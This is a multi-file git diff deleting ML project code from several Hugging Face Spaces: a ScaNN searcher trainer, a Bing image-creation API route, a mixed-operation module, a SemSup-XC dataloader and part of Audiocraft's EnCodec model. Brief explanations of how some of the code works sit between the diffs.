- # https://github.com/google-research/google-research/blob/aca5f2e44e301af172590bb8e65711f0c9ee0cfd/scann/docs/algorithms.md
- if pool_size < 2e4:
- print('Using brute force search.')
- searcher = search_bruteforce(searcher)
- elif 2e4 <= pool_size < 1e5:
- print('Using asymmetric hashing search and reordering.')
- searcher = search_ah(searcher, dims_per_block, aiq_thld, reorder_k)
- else:
- print('Using partitioning, asymmetric hashing search and reordering.')
-
- if not partioning_trainsize:
- partioning_trainsize = data_pool['embedding'].shape[0] // 10
- if not num_leaves:
- num_leaves = int(np.sqrt(pool_size))
-
- if not num_leaves_to_search:
- num_leaves_to_search = max(num_leaves // 20, 1)
-
- print('Partitioning params:')
- print(f'num_leaves: {num_leaves}')
- print(f'num_leaves_to_search: {num_leaves_to_search}')
- # self.searcher = self.search_ah(searcher, dims_per_block, aiq_thld, reorder_k)
- searcher = search_partioned_ah(searcher, dims_per_block, aiq_thld, reorder_k,
- partioning_trainsize, num_leaves, num_leaves_to_search)
-
- print('Finish training searcher')
- searcher_savedir = opt.target_path
- os.makedirs(searcher_savedir, exist_ok=True)
- searcher.serialize(searcher_savedir)
- print(f'Saved trained searcher under "{searcher_savedir}"')
-
-if __name__ == '__main__':
- sys.path.append(os.getcwd())
- parser = argparse.ArgumentParser()
- parser.add_argument('--database',
- '-d',
- default='data/rdm/retrieval_databases/openimages',
- type=str,
- help='path to folder containing the clip feature of the database')
- parser.add_argument('--target_path',
- '-t',
- default='data/rdm/searchers/openimages',
- type=str,
- help='path to the target folder where the searcher shall be stored.')
- parser.add_argument('--knn',
- '-k',
- default=20,
- type=int,
- help='number of nearest neighbors, for which the searcher shall be optimized')
-
- opt, _ = parser.parse_known_args()
-
- train_searcher(opt,)
\ No newline at end of file
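
The script above is self-contained: it reads every *.npz file under --database (each must contain an 'embedding' array), normalizes the embeddings, and serializes a scaNN searcher into --target_path. With the parser defaults shown above, a typical invocation would look like

    python scripts/train_searcher.py --database data/rdm/retrieval_databases/openimages --target_path data/rdm/searchers/openimages --knn 20

The searcher backend is then chosen from the pool size, mirroring the scaNN guidelines linked in the code: brute force below 2e4 embeddings, asymmetric hashing with reordering up to 1e5, and partitioned asymmetric hashing beyond that.
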
diff --git a/spaces/Pengyey/bingo-chuchu/src/pages/api/image.ts b/spaces/Pengyey/bingo-chuchu/src/pages/api/image.ts
deleted file mode 100644
index 26fdb31076a9c71e70d1725a630844b27f5a3221..0000000000000000000000000000000000000000
--- a/spaces/Pengyey/bingo-chuchu/src/pages/api/image.ts
+++ /dev/null
@@ -1,38 +0,0 @@
-'use server'
-
-import { NextApiRequest, NextApiResponse } from 'next'
-import { debug } from '@/lib/isomorphic'
-import { createHeaders } from '@/lib/utils'
-import { createImage } from '@/lib/bots/bing/utils'
-
-export default async function handler(req: NextApiRequest, res: NextApiResponse) {
- const { prompt, id } = req.query
- if (!prompt) {
- return res.json({
- result: {
- value: 'Image',
- message: 'No Prompt'
- }
- })
- }
- try {
- const headers = createHeaders(req.cookies, 'image')
-
- debug('headers', headers)
- const response = await createImage(String(prompt), String(id), {
- ...headers,
- 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32',
- })
- res.writeHead(200, {
- 'Content-Type': 'text/plain; charset=UTF-8',
- })
- return res.end(response)
- } catch (e) {
- return res.json({
- result: {
- value: 'Error',
- message: `${e}`
- }
- })
- }
-}
diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/fileio/handlers/__init__.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/fileio/handlers/__init__.py
deleted file mode 100644
index aa24d91972837b8756b225f4879bac20436eb72a..0000000000000000000000000000000000000000
--- a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/fileio/handlers/__init__.py
+++ /dev/null
@@ -1,7 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-from .base import BaseFileHandler
-from .json_handler import JsonHandler
-from .pickle_handler import PickleHandler
-from .yaml_handler import YamlHandler
-
-__all__ = ['BaseFileHandler', 'JsonHandler', 'PickleHandler', 'YamlHandler']
diff --git a/spaces/Pinwheel/GLIP-BLIP-Object-Detection-VQA/maskrcnn_benchmark/modeling/backbone/mixer.py b/spaces/Pinwheel/GLIP-BLIP-Object-Detection-VQA/maskrcnn_benchmark/modeling/backbone/mixer.py
deleted file mode 100644
index 99e632ec598c7951b2807ac3d68664fdef693e0a..0000000000000000000000000000000000000000
--- a/spaces/Pinwheel/GLIP-BLIP-Object-Detection-VQA/maskrcnn_benchmark/modeling/backbone/mixer.py
+++ /dev/null
@@ -1,23 +0,0 @@
-import torch
-from torch import nn
-
-class MixedOperationRandom(nn.Module):
- def __init__(self, search_ops):
- super(MixedOperationRandom, self).__init__()
- self.ops = nn.ModuleList(search_ops)
- self.num_ops = len(search_ops)
-
- def forward(self, x, x_path=None):
- if x_path is None:
- output = sum(op(x) for op in self.ops) / self.num_ops
- else:
- assert isinstance(x_path, (int, float)) and 0 <= x_path < self.num_ops or isinstance(x_path, torch.Tensor)
- if isinstance(x_path, (int, float)):
- x_path = int(x_path)
- assert 0 <= x_path < self.num_ops
- output = self.ops[x_path](x)
- elif isinstance(x_path, torch.Tensor):
- assert x_path.size(0) == x.size(0), 'batch_size of x should match length of x_path'
- output = torch.cat([self.ops[int(x_path[i].item())](x.narrow(0, i, 1))
- for i in range(x.size(0))], dim=0)
- return output
\ No newline at end of file
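
MixedOperationRandom above supports three routing modes: averaging every candidate op when x_path is None, running a single op for the whole batch when x_path is an int or float, and routing each sample through its own op when x_path is a tensor of indices. A minimal sketch of the first and last modes, with two toy Linear layers standing in for the real search space:

    import torch
    from torch import nn

    ops = nn.ModuleList([nn.Linear(4, 4), nn.Linear(4, 4)])  # toy stand-ins for the searchable ops
    x = torch.randn(3, 4)

    # x_path is None: average the outputs of every candidate op.
    avg_out = sum(op(x) for op in ops) / len(ops)

    # x_path is a per-sample tensor of op indices: each sample goes through its own op.
    x_path = torch.tensor([0, 1, 0])
    routed = torch.cat(
        [ops[int(x_path[i].item())](x.narrow(0, i, 1)) for i in range(x.size(0))], dim=0
    )
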
diff --git a/spaces/Pranjal2041/SemSup-XC/cleaned_code/src/dataloaders.py b/spaces/Pranjal2041/SemSup-XC/cleaned_code/src/dataloaders.py
deleted file mode 100644
index 4ee569224466ae6655b13a58b11804d25165cfaf..0000000000000000000000000000000000000000
--- a/spaces/Pranjal2041/SemSup-XC/cleaned_code/src/dataloaders.py
+++ /dev/null
@@ -1,394 +0,0 @@
-from typing import Dict, Optional
-import numpy as np
-import torch
-import itertools
-import torch
-from torch.utils.data import Dataset
-import json
-import random
-from collections.abc import Mapping
-from typing import Dict, Optional, List, Any, NewType
-import pandas as pd
-from torch.utils.data import DataLoader
-from os.path import join
-import os
-import gensim.downloader
-import h5py
-import time
-from tqdm import tqdm
-
-def getTokenizedLabelDescriptions(data_args, desc_file, tokenizer):
- padding = "max_length" if data_args.pad_to_max_length else False
- max_seq_length = min(data_args.label_max_seq_length, tokenizer.model_max_length)
-
- label_descs = json.load(open(desc_file, encoding = 'utf-8'))
-
- return {label_key: [
- tokenizer(
- desc,
- truncation=True,
- padding=padding,
- max_length=max_seq_length,
- return_tensors='pt'
- )
- for desc in descs[1]] for label_key, descs in label_descs.items()}
-
-
-class SemSupDataset(Dataset):
-
- def __init__(self, input_dataset, data_args, label_descriptions_file, label_to_id, id_to_label, tokenizer, class_descs_len = None, return_desc_embeddings = False, sampleRandom : int = -1, cl_min_positive_descs = 20, useSemSup = True, seen_labels = None, add_label_name = False, max_descs_per_label = 999999, use_precomputed_embeddings = '', bm_short_file = '', ignore_pos_labels_file = '', isTrain = True, class_descs_tokenized = None, choice_indexes = None):
- self.input_dataset = input_dataset
- self.sampleRandom = sampleRandom
- self.cl_min_positive_descs = cl_min_positive_descs
- self.semsup = useSemSup
- self.seen_labels = seen_labels
- self.add_label_name = add_label_name
- self.max_descs_per_label = max_descs_per_label
- self.use_precomputed_embeddings = use_precomputed_embeddings
- self.choice_indexes = choice_indexes
-
- self.bmshortfile = bm_short_file
- self.useBMShort = True if self.bmshortfile!='' else False
- self.data_args = data_args
-
- self.tok_format = 0
- self.isTrain = isTrain
-
- # if data_args.large_dset:
- # Instead of loading the
- self.coil_cluster_map = None
- try:
- if data_args.coil_cluster_mapping_path:
- self.coil_cluster_map = json.load(open(data_args.coil_cluster_mapping_path))
- except:
- print('Failed to load cluster map for some reason')
- self.coil_cluster_map = None
- self.ignore_pos_labels_file = ignore_pos_labels_file
- if self.ignore_pos_labels_file:
- self.ignored_labels = [[y.strip() for y in x.split('\t') if y.strip()!=''] for x in open(self.ignore_pos_labels_file).readlines()]
- else:
- self.ignored_labels = False
-
- if self.useBMShort and not data_args.large_dset:
- self.shortlists = [[y.strip() for y in x.split('\t')] for x in open(self.bmshortfile).readlines()]
-
- if self.semsup and not data_args.large_dset:
- self.data_args = data_args
- self.label_descriptions_file = label_descriptions_file
- self.label_to_id = label_to_id
- self.id_to_label = id_to_label
- if self.seen_labels is not None and isinstance(self.seen_labels[0], str):
- self.seen_labels = np.array([self.label_to_id[x] for x in self.seen_labels])
- self.tokenizer = tokenizer
- if class_descs_len is None:
- js_file = json.load(open(self.label_descriptions_file, encoding = 'utf-8'))
- self.class_descs_len = self.tokenize_class_descs(js_file, return_lengths = True)
- self.class_descs = self.tokenize_class_descs(js_file)
- else:
- self.class_descs_len = class_descs_len
- self.return_desc_embeddings = return_desc_embeddings
-
- self.label_max_seq_length = data_args.label_max_seq_length
- if return_desc_embeddings:
- self.save_tokenized_descs(self.add_label_name)
-
- if self.use_precomputed_embeddings:
- self.computed_desc_inputs_embeds = torch.from_numpy(np.load(self.use_precomputed_embeddings))
- if self.semsup and data_args.large_dset:
- self.data_args = data_args
- self.label_descriptions_file = label_descriptions_file
- self.label_to_id = label_to_id
- self.id_to_label = id_to_label
- # No concept of seen labels over here, directly load the shortlists
- self.tokenizer = tokenizer
- self.return_desc_embeddings = return_desc_embeddings
- self.label_max_seq_length = data_args.label_max_seq_length
-
- to_save = True
- if os.path.exists(data_args.tokenized_descs_file):
- print('Path Exists')
- if data_args.tok_format == 1:
- self.tok_format = 1
- if class_descs_tokenized is not None:
- self.class_descs_tokenized = class_descs_tokenized
- else:
- if data_args.tokenized_descs_file.endswith('h5'):
- self.class_descs_tokenized = h5py.File(data_args.tokenized_descs_file) # np.load(data_args.tokenized_descs_file, allow_pickle=True).item()
- self.tok_format = 1
- else:
- self.class_descs_tokenized = np.load(data_args.tokenized_descs_file, allow_pickle=True)
-
- # TODO: Fix this hardcoding
- # if len(arr) < int(1e6):
- # to_save = True # Possibly Corrupt File
- # # All set, load the file
- # else:
- to_save = False
- js_file = json.load(open(self.label_descriptions_file, encoding = 'utf-8'))
- print('Loaded js File')
- self.class_descs_len = self.tokenize_class_descs(js_file, return_lengths = True)
- if to_save:
- self.class_descs = self.tokenize_class_descs(js_file)
- print('Begin Tokenization Process')
- self.save_tokenized_descs(self.add_label_name)
- print('Saving Tokenized Descriptions')
- import pickle
- pickle.dump(self.class_descs_tokenized, open(data_args.tokenized_descs_file,'wb'))
- print(len(self.class_descs_tokenized))
- 3/0  # raises ZeroDivisionError: a hard stop after the pickle dump, so the h5 export below never runs
- file = h5py.File(data_args.tokenized_descs_file,'w')
- for key in tqdm(self.class_descs_tokenized):
- key_h5 = key
- if key.find('/') != -1:
- print('There may be issue with', key)
- key_h5 = key.replace('/','\/')
- file.create_dataset(key_h5+'/'+'input_ids', data = np.array(self.class_descs_tokenized[key]['input_ids']))
- file[key_h5].create_dataset('attention_mask', data = np.array(self.class_descs_tokenized[key]['attention_mask']))
- # else:
- # self.class_descs_tokenized = np.load(data_args.tokenized_descs_file).item()
-
- if isTrain:
- self.shortlists = h5py.File(data_args.train_tfidf_short)['data']
- else:
- print('Test file loaded')
- self.shortlists = h5py.File(data_args.test_tfidf_short)['data']
-
- try:
- del self.class_descs
- except: ...
- if self.tok_format != 1:
- self.class_descs_tokenized = pd.DataFrame({k: [np.array(x) for i, x in enumerate(v.values()) if i != 1] for k,v in self.class_descs_tokenized.items()})
-
- def tokenize_class_descs(self, label_descs, return_lengths = False):
- if return_lengths == 1:
- return {
- label_key: min(descs[0],self.max_descs_per_label) for label_key, descs in label_descs.items()
- } # descs 0 is the length
- else:
- return {
- label_key: descs[1][:self.max_descs_per_label] for label_key, descs in label_descs.items()
- }
-
- def save_tokenized_descs(self, add_label_name = False):
- self.class_descs_tokenized = dict()
- for label_key in tqdm(list(self.class_descs.keys())):
- descs_len = self.class_descs_len[label_key]
- descs = self.class_descs[label_key]
- self.class_descs_tokenized[label_key] = self.tokenizer(
- [label_key + ". " + x for x in descs] if add_label_name else
- descs,
- max_length = self.label_max_seq_length, padding = 'max_length', truncation= True)
- # del self.class_descs_tokenized[label_key]['token_type_ids']
-
- def __len__(self):
- return len(self.input_dataset)
-
-
- def get_item_for_large_dset(self, idx, item):
- if self.choice_indexes is not None:
- idx = int(self.choice_indexes[idx])
- # print(idx)
- shortlists = self.shortlists[idx]
- labels_new = item['label']
-
- if self.sampleRandom != -1:
- if self.sampleRandom < len(shortlists):
- shortlists = np.random.choice(shortlists, self.sampleRandom, replace = False)
- elif self.sampleRandom > len(shortlists):
- # randomly choose from all remaining labels
- shortlists = shortlists.tolist() + [self.label_to_id[x] for x in np.random.choice(self.seen_labels, self.sampleRandom - len(shortlists), replace = False)]
- if self.isTrain:
- pos_labels = np.where(np.array(labels_new) == 1)[0]
- item['all_candidate_labels'] = np.unique(np.concatenate([pos_labels, shortlists]))[:len(shortlists)]
- else:
- item['all_candidate_labels'] = np.unique(shortlists)
- if self.sampleRandom!=-1:
- if len(item['all_candidate_labels']) < self.sampleRandom:
- # Duplicate entries were deleted, manually add some duplicates :)
- item['all_candidate_labels'] = np.concatenate([item['all_candidate_labels'], item['all_candidate_labels'][len(item['all_candidate_labels'])-self.sampleRandom:]])
-
- item['all_candidate_labels'] = item['all_candidate_labels'][:self.sampleRandom]
-
- l1 = len(item['all_candidate_labels'])
- if self.ignored_labels:
- # Remove the ignored labels
- # After removing make sure the size is equal to l1, by randomly duplicating elements
- ignore_list = {self.label_to_id[x] for x in self.ignored_labels[idx]}
- if len(ignore_list) > 0:
- item['all_candidate_labels'] = set(item['all_candidate_labels'].tolist()).difference(ignore_list)
- item['all_candidate_labels'] = sorted(list(item['all_candidate_labels']))
-
- if len(item['all_candidate_labels']) < l1:
- item['all_candidate_labels'] += item['all_candidate_labels'][:l1 - len(item['all_candidate_labels'])]
- item['all_candidate_labels'] = np.array(item['all_candidate_labels'])
-
- # l1 = np.array(item['label']).sum()
- item['label'] = np.array(item['label'])[item['all_candidate_labels']]
- # print(f'{item["label"].sum()} / {l1}')
- item['label_desc_ids'] = [np.random.randint(0, self.class_descs_len[self.id_to_label[label_key]]) for label_key in item['all_candidate_labels']]
-
- if self.tok_format ==1:
- item['desc_input_ids'] = [self.class_descs_tokenized['input_ids'][label_key][item['label_desc_ids'][i]].astype(np.int32) for i, label_key in enumerate(item['all_candidate_labels'])]
- item['desc_attention_mask'] = [self.class_descs_tokenized['attention_mask'][label_key][item['label_desc_ids'][i]].astype(np.int32) for i, label_key in enumerate(item['all_candidate_labels'])]
- else:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][i]] for i, label_key in enumerate(item['all_candidate_labels'])]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][i]] for i, label_key in enumerate(item['all_candidate_labels'])]
- pos_pts = item['label'].nonzero()[0]
- # if len(pos_pts) > 0:
- # print(idx, item['desc_input_ids'][pos_pts[0]])
-
- if self.coil_cluster_map:
- map_to_cluster = lambda x : self.coil_cluster_map[str(x)]
- if isinstance(item['input_ids'], list):
- item['clustered_input_ids'] = [self.coil_cluster_map[str(x)] for x in item['input_ids']]
- else:
- item['clustered_input_ids'] = item['input_ids'].vectorize(map_to_cluster)
- item['clustered_desc_ids'] = [[self.coil_cluster_map[str(x)] for x in xx] for xx in item['desc_input_ids']]
-
- return item
-
- def __getitem__(self, idx):
- item = self.input_dataset.__getitem__(idx)
- if self.data_args.large_dset:
- return self.get_item_for_large_dset(idx, item)
-
-
- # Iterate over all the labels of input_dataset
- # and add random label_description to the item in the same order
- if self.ignored_labels:
- ignored_labels = self.ignored_labels[idx]
- if self.sampleRandom != -1:
- # Create all_candidate_labels
- if self.seen_labels is None:
- labels_new = item['label']
- else:
- labels_new = np.array(item['label'])[self.seen_labels]
-
- if self.useBMShort:
- # Instead of choosing randomly, choose 60% topmost most from the shortlist
- # Next sample the remaining random entries
- if self.seen_labels is not None:
- # from pdb import set_trace as bp
- # bp()
- all_candidate_labels = [self.seen_labels.tolist().index(self.label_to_id[x]) for x in self.shortlists[idx] if self.label_to_id[x] in self.seen_labels][:int(0.8*self.sampleRandom)]
- # print(f'BM got: {len(all_candidate_labels)}')
- # Choose the remaining randomly from set of seen_labels - all_candidates
- all_candidate_labels += np.random.choice(list({x for x in range(len(self.seen_labels))}.difference(set(all_candidate_labels))), self.sampleRandom - len(all_candidate_labels), replace = False).tolist()
- else:
- all_candidate_labels = np.random.choice(range(len(labels_new)) , self.sampleRandom , replace = False)
- # prepend positive labels
- pos_labels = np.where(np.array(labels_new) == 1)[0]
- all_candidate_labels = np.concatenate([pos_labels, all_candidate_labels])
- # Remove duplicates
- all_candidate_labels = np.unique(all_candidate_labels)[:self.sampleRandom]
- if len(pos_labels) < self.cl_min_positive_descs:
- addn_pos_labels = np.random.choice(pos_labels, self.cl_min_positive_descs - len(pos_labels))
- all_candidate_labels = np.concatenate([addn_pos_labels, all_candidate_labels])[:self.sampleRandom]
- np.random.shuffle(all_candidate_labels)
- item['all_candidate_labels'] = all_candidate_labels
- # NOTE: ids will be according to seen labels
- # Now update the labels based on all_candidate_labels
-
- # print('Getting Data')
- if self.semsup:
- # print(len(item['label']))
- if 'all_candidate_labels' not in item:
- item['label_desc_ids'] = [np.random.randint(0, self.class_descs_len[self.id_to_label[label_key]]) for label_key in range(len(item['label']))]
- if self.return_desc_embeddings:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- if self.use_precomputed_embeddings:
- new_indices = [i*5 + x for i,x in enumerate(item['label_desc_ids'])]
- # item['desc_inputs_embeds'] = [self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] ] for label_key in range(len(item['label']))]
- # item['desc_inputs_embeds'] = self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] for label_key in range(len(item['label']))]
- if self.seen_labels is not None:
- new_indices = [x for i, x in enumerate(new_indices) if i in self.seen_labels]
- item['desc_inputs_embeds'] = self.computed_desc_inputs_embeds[new_indices]
-
- item['all_candidate_labels'] = range(len(item['label']))
-
- if self.seen_labels is not None:
- item['label_desc_ids'] = (np.array(item['label_desc_ids'])[self.seen_labels]).tolist()
- if self.return_desc_embeddings:
- item['desc_input_ids'] = (np.array(item['desc_input_ids']))[self.seen_labels].tolist()
- item['desc_attention_mask'] = (np.array(item['desc_attention_mask']))[self.seen_labels].tolist()
- # if self.use_precomputed_embeddings:
- # item['desc_inputs_embeds'] = torch.tensor(item['desc_inputs_embeds'])[self.seen_labels]
-
- item['all_candidate_labels'] = (np.array(item['all_candidate_labels']))[self.seen_labels].tolist()
- item['label'] = (np.array(item['label']))[self.seen_labels].tolist()
- elif 'all_candidate_labels' in item:
- # print('Computing')
- st = time.time()
- item['label_desc_ids'] = [np.random.randint(0, self.class_descs_len[self.id_to_label[label_key]]) for label_key in range(len(item['label']))]
- if self.seen_labels is not None:
- if self.return_desc_embeddings:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- if self.use_precomputed_embeddings:
- new_indices = [i*5 + x for i,x in enumerate(item['label_desc_ids'])]
- # Now of the 4271 labels, chose only the seen labels
- new_indices = [x for i, x in enumerate(new_indices) if i in self.seen_labels]
- # Now choose all_candidate labels
- # print(len(new_indices))
- new_indices = [new_indices[x] for x in sorted(item['all_candidate_labels'])]
- # print(len(new_indices), len(item['all_candidate_labels']))
- # if len(new_indices)!=1500:
- # print('Some Issue Over Here')
- item['desc_inputs_embeds'] = self.computed_desc_inputs_embeds[new_indices]
- # [self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] ] for label_key in range(len(item['label']))]
- # print('Mid Calculation Done', item['desc_inputs_embeds'].shape, time.time() - st)
- item['label_desc_ids'] = np.array(item['label_desc_ids'])[self.seen_labels].tolist()
- item['label'] = np.array(item['label'])[self.seen_labels].tolist()
- item['label'] = np.array(item['label'])[all_candidate_labels].tolist()
- item['desc_input_ids'] = np.array(item['desc_input_ids'])[self.seen_labels][item['all_candidate_labels']].tolist()
- item['desc_attention_mask'] = np.array(item['desc_attention_mask'])[self.seen_labels][item['all_candidate_labels']].tolist()
- # if self.use_precomputed_embeddings:
- # print('Starting Final Compute', time.time() - st)
- # item['desc_inputs_embeds'] = item['desc_inputs_embeds'][self.seen_labels][item['all_candidate_labels']]#.tolist()
- # print('Computed', type(item['desc_inputs_embeds']), type(item['desc_inputs_embeds'][0]), time.time() - st)
- else:
- item['label'] = np.array(item['label'])[all_candidate_labels].tolist()
- if self.return_desc_embeddings:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][label_key]] for label_key in np.array(item['all_candidate_labels'])]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][label_key]] for label_key in np.array(item['all_candidate_labels'])]
- if self.use_precomputed_embeddings:
- item['desc_inputs_embeds'] = [self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] ] for label_key in np.array(item['all_candidate_labels'])]
-
- if self.ignored_labels:
- if self.sampleRandom != -1 and self.seen_labels is not None:
- ignored_labels = [self.seen_labels.tolist().index(self.label_to_id[x]) for x in self.ignored_labels[idx]]
- item['all_candidate_labels'] = item['all_candidate_labels'].tolist()
- else:
- ignored_labels = [self.label_to_id[x] for x in self.ignored_labels[idx]]
- remove_pts = [item['all_candidate_labels'].index(x) for x in ignored_labels if x in item['all_candidate_labels']]
- keep_pts = [x for x in range(len(item['all_candidate_labels'])) if x not in remove_pts]
- # Keep pts can be less than sampleRandom. Manually pad after choosing some values
- # print('Before Len', len(keep_pts), len(item['desc_input_ids']))
- if self.sampleRandom!=-1 and len(keep_pts) < self.sampleRandom:
- # print('Inside the choice function')
- keep_pts += np.random.choice(keep_pts, self.sampleRandom - len(keep_pts), replace = False).tolist()
- # print('After Len', len(keep_pts), len(item['desc_input_ids']))
-
- # print(len(keep_pts), max(keep_pts))
- item['desc_input_ids'] = np.array(item['desc_input_ids'])[keep_pts].tolist()
- item['desc_attention_mask'] = np.array(item['desc_attention_mask'])[keep_pts].tolist()
- if 'desc_inputs_embeds' in item:
- item['desc_inputs_embeds'] = np.array(item['desc_inputs_embeds'])[keep_pts].tolist()
- item['label_desc_ids'] = np.array(item['label_desc_ids'])[keep_pts].tolist()
- item['label'] = np.array(item['label'])[keep_pts].tolist()
-
- if self.coil_cluster_map:
- map_to_cluster = lambda x : self.coil_cluster_map[str(x)]
- if isinstance(item['input_ids'], list):
- item['clustered_input_ids'] = [self.coil_cluster_map[str(x)] for x in item['input_ids']]
- else:
- item['clustered_input_ids'] = item['input_ids'].vectorize(map_to_cluster)
- item['clustered_desc_ids'] = [[self.coil_cluster_map[str(x)] for x in xx] for xx in item['desc_input_ids']]
- return item
-
-
- else:
- return item
-
-
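
One detail that is easy to miss in the dataset above is the optional COIL cluster remapping: when data_args.coil_cluster_mapping_path is set, every token id of both the document and the sampled label descriptions is passed through a JSON dictionary keyed by the string form of the id, producing clustered_input_ids and clustered_desc_ids. A minimal sketch with a made-up mapping (the real map is loaded from the JSON file named in the config):

    # Hypothetical cluster map; in the dataset it comes from json.load(open(coil_cluster_mapping_path)).
    coil_cluster_map = {"0": 0, "101": 7, "102": 7, "2023": 41}

    input_ids = [101, 2023, 102]
    clustered_input_ids = [coil_cluster_map[str(t)] for t in input_ids]  # [7, 41, 7]
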
diff --git a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/models/encodec.py b/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/models/encodec.py
deleted file mode 100644
index 1cf6b54b582975a01bdb7a06280c766d3d2cc72c..0000000000000000000000000000000000000000
--- a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/models/encodec.py
+++ /dev/null
@@ -1,392 +0,0 @@
-# Copyright (c) Meta Platforms, Inc. and affiliates.
-# All rights reserved.
-#
-# This source code is licensed under the license found in the
-# LICENSE file in the root directory of this source tree.
-"""Compression models or wrapper around existing models.
-Also defines the main interface that a model must follow to be usable as an audio tokenizer.
-"""
-
-from abc import ABC, abstractmethod
-import logging
-import math
-from pathlib import Path
-import typing as tp
-
-import numpy as np
-import torch
-from torch import nn
-from transformers import EncodecModel as HFEncodecModel
-
-from .. import quantization as qt
-
-
-logger = logging.getLogger()
-
-
-class CompressionModel(ABC, nn.Module):
- """Base API for all compression model that aim at being used as audio tokenizers
- with a language model.
- """
-
- @abstractmethod
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- ...
-
- @abstractmethod
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- """See `EncodecModel.encode`."""
- ...
-
- @abstractmethod
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- """See `EncodecModel.decode`."""
- ...
-
- @abstractmethod
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- ...
-
- @property
- @abstractmethod
- def channels(self) -> int:
- ...
-
- @property
- @abstractmethod
- def frame_rate(self) -> float:
- ...
-
- @property
- @abstractmethod
- def sample_rate(self) -> int:
- ...
-
- @property
- @abstractmethod
- def cardinality(self) -> int:
- ...
-
- @property
- @abstractmethod
- def num_codebooks(self) -> int:
- ...
-
- @property
- @abstractmethod
- def total_codebooks(self) -> int:
- ...
-
- @abstractmethod
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer."""
- ...
-
- @staticmethod
- def get_pretrained(
- name: str, device: tp.Union[torch.device, str] = 'cpu'
- ) -> 'CompressionModel':
- """Instantiate a CompressionModel from a given pretrained model.
-
- Args:
- name (Path or str): name of the pretrained model. See after.
- device (torch.device or str): Device on which the model is loaded.
-
- Pretrained models:
- - dac_44khz (https://github.com/descriptinc/descript-audio-codec)
- - dac_24khz (same)
- - facebook/encodec_24khz (https://huggingface.co/facebook/encodec_24khz)
- - facebook/encodec_32khz (https://huggingface.co/facebook/encodec_32khz)
- - your own model on Hugging Face. Export instructions to come...
- """
-
- from . import builders, loaders
- model: CompressionModel
- if name in ['dac_44khz', 'dac_24khz']:
- model_type = name.split('_')[1]
- logger.info("Getting pretrained compression model from DAC %s", model_type)
- model = DAC(model_type)
- elif name in ['debug_compression_model']:
- logger.info("Getting pretrained compression model for debug")
- model = builders.get_debug_compression_model()
- elif Path(name).exists():
- # We assume here if the paths exist that it is in fact an AC checkpoint
- # that was exported using `audiocraft.utils.export` functions.
- model = loaders.load_compression_model(name, device=device)
- else:
- logger.info("Getting pretrained compression model from HF %s", name)
- hf_model = HFEncodecModel.from_pretrained(name)
- model = HFEncodecCompressionModel(hf_model).to(device)
- return model.to(device).eval()
-
-
-class EncodecModel(CompressionModel):
- """Encodec model operating on the raw waveform.
-
- Args:
- encoder (nn.Module): Encoder network.
- decoder (nn.Module): Decoder network.
- quantizer (qt.BaseQuantizer): Quantizer network.
- frame_rate (int): Frame rate for the latent representation.
- sample_rate (int): Audio sample rate.
- channels (int): Number of audio channels.
- causal (bool): Whether to use a causal version of the model.
- renormalize (bool): Whether to renormalize the audio before running the model.
- """
- # we need assignment to override the property in the abstract class,
- # I couldn't find a better way...
- frame_rate: float = 0
- sample_rate: int = 0
- channels: int = 0
-
- def __init__(self,
- encoder: nn.Module,
- decoder: nn.Module,
- quantizer: qt.BaseQuantizer,
- frame_rate: int,
- sample_rate: int,
- channels: int,
- causal: bool = False,
- renormalize: bool = False):
- super().__init__()
- self.encoder = encoder
- self.decoder = decoder
- self.quantizer = quantizer
- self.frame_rate = frame_rate
- self.sample_rate = sample_rate
- self.channels = channels
- self.renormalize = renormalize
- self.causal = causal
- if self.causal:
- # we force disabling here to avoid handling linear overlap of segments
- # as supported in original EnCodec codebase.
- assert not self.renormalize, 'Causal model does not support renormalize'
-
- @property
- def total_codebooks(self):
- """Total number of quantizer codebooks available."""
- return self.quantizer.total_codebooks
-
- @property
- def num_codebooks(self):
- """Active number of codebooks used by the quantizer."""
- return self.quantizer.num_codebooks
-
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer."""
- self.quantizer.set_num_codebooks(n)
-
- @property
- def cardinality(self):
- """Cardinality of each codebook."""
- return self.quantizer.bins
-
- def preprocess(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- scale: tp.Optional[torch.Tensor]
